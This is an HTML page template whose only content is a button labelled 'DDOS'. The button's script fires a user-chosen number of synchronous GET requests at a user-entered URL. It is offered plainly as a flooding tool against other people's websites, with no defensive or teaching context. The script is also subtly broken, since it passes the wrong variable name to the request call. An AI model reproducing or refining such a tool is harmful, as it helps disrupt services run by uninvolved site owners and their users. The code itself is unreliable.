<html>
<head>
<link rel="stylesheet" type="text/css" href="style.css">
</head>
<body background="bg.jpg">
{{> navbar}}
<center>
<input type="text" id = "ssilka"><br><br>
<input type= "text" id  = "count"> <br><br>
<input type="button" value="DDOS" onclick="go();"><br><br>
</center>
{{> footer}}
<script>
  function go(){
	var n = Number(document.getElementById("count").value);
	var s = document.getElementById("ssilka").value;
	for (var i = 0; i < n; ++i){
		var xhr = new XMLHttpRequest();
		xhr.open("GET", ssilka, false);
		xhr.send();
	}
  }

</script>
</body>
</html>
